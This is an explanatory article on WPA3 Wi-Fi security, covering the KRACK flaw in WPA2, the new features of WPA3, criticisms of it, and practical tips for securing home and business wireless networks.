What is WPA3? Wi-Fi Protected Access (WPA) is often referred to as a security standard or protocol used to encrypt and protect wi-fi networks like the one you probably use at home or work, but it is actually a security certification program developed by the Wi-Fi Alliance to secure wireless computer networks.
WPA3, released in June 2018, is the successor to WPA2, which security experts describe as “broken.” The goal of developing WPA3 was to make WPA easier to use and to increase its cryptographic strength.
Like its predecessor, WPA3 comes in Personal and Enterprise editions, but this version improves on WPA2 with more robust authentication and encryption features, and a solution to the built-in flaw in WPA2, KRACK. It also includes functionality to simplify, and better secure, the connection of IoT wi-fi devices.
The KRACK (Key Reinstallation Attack) flaw can be categorized as a severe replay attack, and is a form of a man-in-the-middle attack. The fundamental problem with WPA2, highlighted by the KRACK discovery, is a flaw in the WPA2 certification standard itself and not a weakness caused by bad product configuration or service implementation.
We will dive deeper into KRACK later, but the bottom line is any correct implementation of WPA2 is likely to be vulnerable; the vulnerability is inherent in the WPA2 protocol. The solution was the introduction of a new certification: WPA3.
What is WPA3?
In June 2018, Wi-Fi Alliance® announced the introduction of Wi-Fi CERTIFIED WPA3™security, a wi-fi certification standard that:
- Addresses the KRACK vulnerability
- Upgrades WPA2 with additional security features. This is important because there are multiple wi-fi security holes that are more attractive to hackers, and far easier to breach, than KRACK.
WPA3 certification for wi-fi devices can loosely be compared to a roadworthy certificate for your car. Without certification, hardware vendors cannot claim compliance with the Wi-Fi Alliance’s security standards.
WPA3 became mandatory for all new wi-fi certified devices in 2020. Some older devices will have received software updates to support WPA3 — though many won’t.
What is WPA3 and is it secure?
This article looks at how WPA3 improves on WPA2 security, and puts KRACK into perspective. While WPA3 is definitely the right security route to take in the future, users should ensure they implement a multi-faceted, layered security strategy to protect all aspects of their wi-fi network. WPA3 is not enough to completely protect wi-fi networks, although its improvements go a long way towards plugging other wi-fi security holes.
We will also discuss some of the criticisms that have been leveled at WPA3. Finally, we will touch on some of the ways home users and businesses can practice safe wi-fi.
So, is WPA3 secure? Let’s find out.
The extent of the KRACK vulnerability
The discovery of KRACK caused some disquiet in the IT community, the reason being so many wi-fi devices use WPA2, and more and more people are using these devices to connect to the internet. According to Wigle, as of October 2023, there are more than 1.15 billion wireless connections worldwide.
The advent of WPA3 and associated security patches means that there have so far been no documented KRACK attacks in the wild. However, there are plenty of unpatched devices that could be vulnerable to attack.
How secure are current wi-fi encryption standards?
- Wired Equivalent Privacy (WEP) – Very unreliable but still in use. According to Kaspersky Labs, it would take hackers just a few minutes to crack WEP-protected networks.
- Open networks – No security at all.
- Wi-Fi Protected Access (WPA) – In 2002, WPA was intended to be only an intermediary measure to replace WEP, and was superseded by WPA2 in 2004. The problem with WPA was the use of the ineffective TKIP encryption protocol which is not secure.
- Wi-Fi Protected Access 2 (WPA2)
- The Personal version is reasonably secure but vulnerable to brute-force and dictionary attacks. It may allow the interception of communications (handshakes) between the access point and the device at the beginning of a w-ifi session.
- The Enterprise version is to an extent protected from handshake interceptions because it uses additional company authorization procedures.
- Wi-Fi Protected Access 3 (WPA3) – Replaced WPA2 as of January 2018 although it has taken years to roll out. It provides the best wi-fi security at the moment.
Bear in mind that ONLY WPA2-protected devices are vulnerable specifically to a KRACK attack. An open, unsecured network is not encrypted and vulnerable to pretty much any type of attack, but not in terms of KRACK as it does not use WPA2.
Encryption types used in public wi-fi hotspots globally (Source: Kaspersky Security Network (KSN))
A KRACKing analogy
Flaws in handshaking negotiations — the point where access point (AP) and router meet and greet to confirm a client’s credentials — lie at the heart of the WPA2 vulnerability.
To set the scene, here’s an analogy for the handshake process — if you allow the imagination a little license — based on a visit to a bank.
Illustration of a three-way handshake as described in the analogy below (Source: Wikipedia, with modifications)
- Let us pretend you are at the bank and the teller asks for your name, password, and phone number before they will give you money. You and the bank have agreed on this security procedure to prove you are who you say you are when you withdraw money.
- You give the teller your name, password, and cell number. At this bank, the next step in the process is for the bank to send to your phone a secret code which you will use to confirm your identity.
- Meanwhile, unbeknown to you, somebody behind you in the queue is eavesdropping and has heard your name and password, and most importantly your secret code.
- After you leave the bank the eavesdropper scurries up to the teller and, while your secret code is still valid, withdraws the last of your funds using your stolen name, password and secret code.
You have probably spotted the weak point in the above scenario; security was compromised at some stage when establishing your credentials; not when your credentials were overhead, but because when you left the bank your secret code was still valid. If it had not been, your name, password, cell phone number, and secret code would have been of no use to the eavesdropper.
There is a twist in this tale: the teller and the eavesdropper are in cahoots. This fake teller has in fact spoofed the real teller (who is out to lunch) and this is a man-in-the-middle attack. Both criminals now have your credentials.
This problem, as we shall see, is what WPA3 resolves.
How is WPA2 vulnerable?
The primary vulnerability in WPA2 is the four-way handshake it uses to secure wi-fi connections using a Pre-Shared Key (PSK). In WPA3, the PSK is replaced by a Simultaneous Authentication of Equals (SAE) handshake.
In this section, we will use the analogy from the previous section to help illustrate the problem.
Pre-Shared Key (PSK)
The initial part of the security check you went through at the bank in the analogy above can loosely be compared to WPA2-PSK authentication which requires an individual connects to a wi-fi network (ask for money at the bank in our metaphor) using a passphrase. A PSK refers to a “shared secret”, in this case, a password.
- WPA2 without a PSK is an option used if you want to use an authentication server. A business should choose this option if it wants to assign unique keys to employee’s devices. If a key is compromised, the business would then only need to generate a new key for one device. This would also prevent other devices being compromised by a lost or stolen key, which they could be if all devices used the same key.
- What is the difference between WPA2-PSK and WPA2-Personal? The terms are used interchangeably although WPA2-Personal implies the use of AES, while WPA2-PSK implies a choice between the older TKIP and AES. As explained in a Cisco blog, some devices allow WPA with AES and WPA2 with TKIP. AES is optional in WPA but in WPA2, AES is mandatory and TKIP is optional. Both terms refer to the use of PSK which is what distinguishes WPA2-Personal from WPA2-Enterprise.
Credential authentication in telecommunications is called handshaking. At the bank, you and the teller exchanged a three-step handshake to establish your credentials, the secret code being the final handshake in the process.
All wi-fi networks use a four-way handshake.
In the illustration below, the spoofed wi-fi access point is the fake teller you dealt with at the bank.
Illustration of how a KRACK attack intercepts a four-way handshake (Source: Enisa)
Rowell Dionicio, writing for Packet6, explains: “The attacker will spoof a real access point and trick a client into joining the rogue access point but allows Wi-Fi authentication to complete. To pull off the KRACK attack, the attacker will replay a message within the 4-Way Handshake. The flaw here is that the victim’s device will accept the replay of one of these messages when it should not. Thus allowing the attacker to use a previously used key. A key should only be used once and this is the flaw KRACK attack targets.”
Dionicio goes on: “The technical fix to a KRACK Attack is to prevent the reuse nonce values. Devices must not accept previously used keys.”
Read a more technical explanation of nonce reuse by Mathy Vanhoef, KRACK researcher.
Is WPA3 secure? Sure, but there are improvements to WPA2 too
Various WPA2 enhancements were deployed while WPA3 was being rolled out. These include:
- Imposing the adoption of Protected Management Frames (PMF) on all ‘Wi-Fi CERTIFIED’ devices
- Ensuring vendors do regular checks on certified devices
- Standardising the 128-bit cryptographic suite
What are the two WPA3 versions?
WPA comes in two versions which are based on the end-user’s requirements i.e. home or business use. On the face of it, there is not much difference between WPA3-Personal and WPA3-Enterprise, although the latter is more secure as it was designed to protect ultra-sensitive data and large enterprises.
Let us quickly summarize the two versions as described by the Wi-Fi Alliance. For starters, both versions:
- Use the latest security methods
- Disallow outdated legacy protocols
- Require the use of Protected Management Frames (PMF). According to the Wi-Fi Alliance: “Unicast management action frames are protected from both eavesdropping and forging, and multicast management action frames are protected from forging.” In a nutshell, Wikipedia describes management frames as, “mechanisms that enable data integrity, data origin authenticity, and replay protection.” You can find a technical description of how they work on the Cisco website.
This version provides password-based authentication with good security even when users choose short or weak passwords. It doesn’t require an authentication server and is the basic protocol home users and small businesses use.
- Uses 128-bit encryption
- Makes use of a Simultaneous Authentication of Equals (SAE) handshake which protects against brute force attacks
- Incorporates Forward Secrecy means that a new set of encryption keys are generated every time a WPA3 connection is made, so if the initial password is compromised, it won’t matter
- Bolsters security on public networks
- Easily manages connected devices
- Allows Natural Password Selection, which the Wi-Fi Alliance claims will make it easier for users to remember passphrases
Provides extra protection for enterprise networks transmitting sensitive data, for instance, governments, healthcare organizations, and financial institutions. Includes optional 192-bit minimum strength security mode, aligned with the Commercial National Security Algorithm (CNSA) Suite from the Committee on National Security Systems. This was a request by the US government.
The main difference between WPA3-Personal and WPA3-Enterprise is at the authentication level. The personal version uses PSK and the Enterprise version a cocktail of features that replace IEEE 802.1X from WPA2-Enterprise. Visit Wi-Fi Alliance for the technical specification.
For more information, Eric Geier, writing for Cisco Press, explains how businesses can make the move to WPA3-Enterprise.
New WPA3 features: Four areas of improvement
Four new features in WPA3 are designed to improve on WPA2. However, only one of these is mandatory for WPA3 certification: the dragon handshake. Below is a brief summary of the main features. We will go into more detail later in this section.
- More secure handshake – Simultaneous Authentication of Equals (SAE) protocol (aka the Dragonfly handshake) requires a new interaction with the network every time a device requests an encryption key, slowing down the rate of an attempted attack and making a password more resistant to dictionary and brute force attacks. It also prevents offline decryption of data.
- Replacement of wi-fi protected setup (WPS) – a simpler way to securely add new devices to a network using the Wi-Fi Device Provisioning Protocol (DPP), which allows you to securely add new devices to a network using a QR code or a password. Easy Connect makes setup especially easy for connected home and IoT devices.
- Unauthenticated encryption – Better protection when using public hotspots using Wi-Fi Enhanced Open which provides unauthenticated encryption, a standard called Opportunistic Wireless Encryption (OWE).
- Bigger session key sizes – WPA3-Enterprise will support key sizes the equivalent of 192-bit security during the authentication stage, which will be harder to crack.
Let’s take a more detailed look at the litany of acronyms mentioned above.
Simultaneous Authentication of Equals (SAE) against brute force attacks
SAE is a secure, password-based key exchange used by the WPA3-Personal version to protect users from brute force attacks. It is well-suited to mesh networks, which get their name from the way they create wi-fi coverage. Comparitech describes the setup simply: “By placing several devices around your home, each sending off a wireless signal, you create a ‘mesh’ or network of wireless coverage around your home. This helps eliminate dead or weak spots.”
The benefits of SAE:
- Based on the IEFT Dragonfly key exchange, a cryptographic model for authentication using a password or passphrase, which is resistant to both active and passive attacks, and offline dictionary attacks.
- Enables Forward Secrecy which disallows an attacker from recording an encrypted transmission that could potentially be decoded later should the wireless network password be compromised in the future.
- Only allows one password guess per session. Even if attackers steal data with the hope of cracking the password in their leisure offline, they will be stymied by the one guess feature because they have to “ask” the wi-fi router each time if their guess was correct. Essentially, this limits an attacker to real-time attacks. There has been some question whether this feature could limit legitimate users too. In the real world, legitimate users are unlikely to make 100 automated consecutive guesses within a second, as do hackers, and an application can be coded to allow a limited number of guesses before it starts slowing the service. This feature also hardens the security of weak passwords.
Device Provisioning Protocol (DPP) for managing networks and IoT devices
Wi-Fi CERTIFIED Easy Connect™ (which replaces WPA2’s Wi-Fi Provisioning Service) helps you connect all your devices, even those that do not have a user-friendly interface to type in your password (e.g. Google Home or your smart fridge), using a single intermediate device.
Wi-Fi Alliance describes how it works: A network owner chooses one device as the central point of configuration. While a device with a nice GUI is easiest, you can use any device able to scan a quick response (QR) code or use NFC as the configurator device. Running the DPP — a one-size-fits-all enrolment procedure — from this device connects all scanned devices and gives them the credentials needed to access the network. Note: This is an optional feature and only available on devices with Easy Connect.
After a wi-fi device has been enrolled, it uses its configuration to discover and connect to the network through an access point.
Opportunistic Wireless Encryption (OWE) for safer hotspot surfing
OWE is the driver behind the WiFi Enhanced Open feature, implemented to protect users in public / guest hotspots and prevent eavesdropping. It replaces the old 802.11 “open” authentication standard. With OWE, your data is encrypted even if you haven’t entered a password.
It was designed to provide encrypted data transfer and communication on networks that don’t use passwords (or use a shared password) using Individualized Data Protection (IDP). In essence, each authorized session has its own encryption token. This means each user’s data is protected in its own vault. But, it works on password-protected networks too. This ensures that if an attacker does get hold of the network password, they will still not have access to encrypted data on the network’s devices (see SAE above.)
Are you vulnerable to KRACK?
All is not doom and gloom. Anyone who uses wi-fi is vulnerable, but let us put the problem into perspective. A hacker can only intercept unencrypted traffic between your device and router. If data has been properly encrypted using HTTPS or a VPN, an attacker can’t read it.
Some reassurance from Brendan Fitzpatrick, Vice President, Cyber Risk Engineering, writing for Axio:
- An attack cannot be launched remotely, an attacker needs to be in physical range of a particular wi-fi network.
- An attack takes place only during the four-way handshake.
- The wi-fi passphrase is not revealed during the attack and the attacker is not enabled to join the network.
- Only if the attack is successful can the attacker potentially decrypt traffic between the victim and their access point.
- Currently, the attack is focused only on the client side of the handshake.
In a blog post, Robert Graham notes, KRACK “can’t defeat SSL/TLS or VPNs.” He adds: “Your home network is vulnerable. Many devices will be using SSL/TLS, so are fine, like your Amazon echo, which you can continue to use without worrying about this attack. Other devices, like your Phillips lightbulbs, may not be so protected.” The solution? Patch with updates from your vendor.
What software and devices are vulnerable to KRACK?
According to Matty Vanhoef, Android, Linux, Apple, Windows, OpenBSD, MediaTek, Linksys, and others, could all be affected by some variant of the attacks. Linux and Android versions 6.0 and higher are particularly vulnerable.
You can find a list of affected vendors on the Cert Software Engineering Institute’s web page, Vulnerability Notes Database. The site provides links to vendor information about patches and fixes.
What sort of attack vulnerabilities do insufficiently secured networks expose?
It is not just the danger of being KRACK’d. An unsecured wi-fi network is begging to be attacked. WPA3 will help mitigate these risks. US-Cert outlines the potential attack scenarios:
- Piggybacking: Typical indoor wi-fi range is 150 – 300 feet. If you live close to your neighbor, your connection could be open to attackers… or even the geek son next door who uses your wi-fi to download his movies.
- Wardriving: A type of piggybacking where potential attackers drive around neighborhoods with an antenna looking for unsecured wireless networks.
- Evil twin attacks: In an evil twin attack, an attacker mimics a public network access point, setting up their broadcast signal to be stronger than the one generated by the legitimate access point. Naturally, users connect to the stronger signal, the criminal’s. The victim’s data is then easily read by the hacker. Always check the name and password of a wi-fi hotspot before you connect.
- Wireless sniffing: Avoid public access points that are not secured and where data is not encrypted. Criminals use “sniffers” to find sensitive information such as passwords or credit card numbers.
- Unauthorized computer access: An unsecured hotspot could allow an attacker to access any directories and files you have unintentionally made available for sharing. Always block file sharing in public.
- Shoulder surfing: In public areas, watch out for lurkers, attackers who watch you typing as they walk past or video your session. You can buy a screen protector to avoid this.
- Theft of mobile devices: It is not just the network that poses a risk for your data. If your device is stolen when you are working at a hotspot, it is a bonanza day for criminals. Make sure your data is always password-protected and sensitive information is encrypted. That includes data on portable storage devices.
Some cautions: Words of warning from the finders of the KRACK flaw
Mathy Vanhoef, Postdoctoral Researcher in Computer Security at KU Leuven and one of the researchers who discovered KRACK, has some cautionary remarks about WPA3 worth pondering.
- SAE handshake – If the SAE handshake is not carefully implemented, it may be vulnerable to side-channel attacks, which can be described as attacks based on information about a software implementation. It appears exploitable vulnerabilities arising from incorrect configurations cannot be avoided even by WPA3.
- Unauthenticated encryption – While the use of Opportunistic Wireless Encryption (OWE) will strengthen user privacy in open networks, Vanhoef suggests that only passive attacks (ones in which hackers sniff traffic) can be prevented. Active attacks (ones using dummy access points to trick users) will still enable an adversary to intercept traffic. Vanhoef explains:
One shortcoming of OWE is that there is no mechanism to trust an Access Point on first use. Contrast this with, for example, SSH: the first time you connect to a SSH server, you can trust the public key of the server. This prevents an adversary from intercepting traffic in the future. However, with OWE there is no option to trust a particular AP on first use. So even if you connected to a particular AP previously, an adversary can still set up a fake AP and make you connect to it in the future.
- Missed opportunity – Only one of the four features touted by the Wi-Fi Alliance is actually mandatory for WPA3. “Unfortunately, the WPA3 certification program only mandates support of the new dragonfly handshake. That’s it. The other features are either optional or a part of other certification programs. I fear that in practice this means manufacturers will just implement the new handshake, slap a ‘WPA3 certified’ label on it, and be done with it,” says Vanhoef. The end-result will be that the end-user does not actually know what features are included and how secure they are.
What do the cynics, including IT developers, have to say about WPA3?
The conversations on Bruce Schneiner’s blog, DD-WRT, Security Stack Exchange, or Community Spiceworks contain some interesting input on whether WPA3 really is the ultimate panacea for wi-fi security vulnerabilities. Some contributions include:
- “I suspect WPA3 will help. For a while – until the bad boys find another hole.”
- “A great revenue stream for hardware vendors who will stop patching current gear and insist you buy the new WAPs if you want WPA3.”
- “The most disappointing aspect of WPA3 is that like all previous wi-fi standards (WEP, WPA, WPA2, even WPS), this one has been developed by a closed, members-only, consortium […] All the WPA3 announcement promises is that the closed process on WPA4 can now begin.”
- “The attack vector using KRACK is simply too small (and will continue to decrease) to make these attacks widespread.“ Open networks, for instance, are not vulnerable to KRACK but are much more at risk to malicious attacks than WPA2 networks. At the time of writing, no KRACK attacks have, in fact, been documented; experts argue, that is because the effort is too great for cybercriminals when there are so many softer targets around.
On that cynical note, practice safe wi-fi, stay informed, and start saving for a new router. According to Dion Phillips, writing for InfiniGate, “… it is doubtful that current wireless devices will be updated to support WPA3 and far more likely that the next wave of devices will be put through the certification process. That being said, client devices will also need to be certified in the same way to be able to take advantage of the new certification.”
How can you protect yourself?
How can businesses protect themselves? (Solved)
Mathew Hughes has a few practical suggestions tempered with a few words of caution.
- Install a backwards-compatible patch: Unfortunately, says Hughes, not only are many people slow to install patches, many manufacturers are slow at issuing them.
- Install a VPN, an encrypted tunnel between devices, preventing eavesdropping by outsiders: For some people, he says, this may be impractical as they won’t be able to access other connected devices on their network.
- Use SSL/TLS: This provides an extra layer of encryption to thwart thieves and eavesdroppers as it encrypts packets at the session layer rather than at the network layer (which could be targeted by KRACK attackers.)
- Update devices and software: Ensure your IT department rolls out regular software updates and patches for all company devices including BYODs. Contact the manufacturers to make sure they have actually issued patches that address the KRACK flaw.
- Secure your router: Ensure your router is locked away, safe from internal threats or outsiders visiting the building. There are also a number of defaults on your router you can change to harden security, e.g. restricting inbound traffic, disabling unused services, changing the default login information, and changing the SSID on older devices. Check your router firewall is enabled (it is not always done automatically.) Use SSID to create separate access points for your staff and customers. Turn off WiFi Protected Setup (WPS), used to assist with pairing devices.
Read the related tips for home networks below.
Wi-fi security tips for home networks and IoT devices (Solved)
- Practice basic wi-fi security sense: Read Comparitech’s guide to securing your home wi-fi network.
- Stop using wi-fi: Connect to the internet via an ethernet or data (3/4G) connection at home, or use mobile data, particularly for sensitive transactions.
- Update devices and software: That includes all your devices as well as your router. Contact the manufacturers to make sure they have actually issued patches that address the KRACK flaw.
- Disable file sharing: While it is tempting to share photos with friends and family, try to avoid doing this in a public place. You should also create a directory for file sharing and restrict access to other directories. Always password-protect anything you share.
- Do not perform sensitive transactions in public places: Do your online banking at home.
- Set HTTPS by default in your browser: The major browsers allow you to enable a HTTPS-only mode. The Electronic Frontier Foundation (EFF) tells you how to do it for Firefox, Chrome, Edge and Safari.
- Use a VPN: While VPNs provide great security for your data, make sure your provider is as security-conscious as you are and acknowledges your right to privacy. Some VPNs will log your data despite claiming not to. Read more on this in our in-depth study of 140 VPN logging policies.
- Set up a home wi-fi router: A virtual router allows you to share your internet connection with other nearby devices. It is easier than you think, and similar to setting up a wi-fi hotspot on your smartphone.
- Secure your router: There are a number of defaults on your router you can change to harden security, e.g. restricting inbound traffic, disabling unused services, and changing the SSID on older devices.
- Confirm your ISP is up-to-date: Many home wi-fi users use the router supplied by their ISP. If you do, confirm your ISP has patched all their devices.
- Avoid public wi-fi hotspots: Or, at least learn how to minimize the risks of using public wi-fi.
- Manually check URLs are secure: HTTP URLs use SSL encryption to protect visitors to their site. HTTP URLs do not. You can see whether a URL is secure in the address bar. Also, enable the Always use a secure connection (HTTPS) option on your device.
- Use secure passwords: Comparitech has some suggestions on creating strong passwords. Always change default passwords, like “Admin” or “123.”
- Keep antivirus software up to date: Choose reputable antivirus software and keep it patched. There are also plenty of free antivirus applications around.
- Turn it off: Turn off your wi-fi connection when you are not using it and disable automatic reconnection.
- Use multi-layered security: Keep your operating system’s firewall updated and use two-factor authentication to access your internet accounts.
- Use Advanced Encryption Standard (AES) encryption: Check that your home network uses WPA2 with AES encryption, not TKIP. Both encryption options are vulnerable to traffic decryption via KRACK, but AES is not vulnerable to packet injection.
Do I need WPA3?
It is better to be safe than sorry, so yes, you do.
Changing your WPA2 password will not protect you against a KRACK attack which focuses on key management. However, it makes security sense to always choose strong passwords.
But, is WPA3 enough?
John Wu, in an article on LinkedIn, says WPA3 is not enough to ensure total wi-fi security because hackers use other methods to attack wi-fi methods. “The recent VPNFilter virus doesn’t take advantage of any of the WPA2 shortcomings. Instead, the attack is targeting known vulnerabilities in the WiFi routers’ web interface, remote ports that are open with hard-coded passwords, software that is not updated, and vulnerable connected IoT devices.”
The solution? Use the checklists above on how to protect your wi-fi connections as a guide to creating a layered approach to wi-fi security. Top of the list? Stay up-do-date with patches.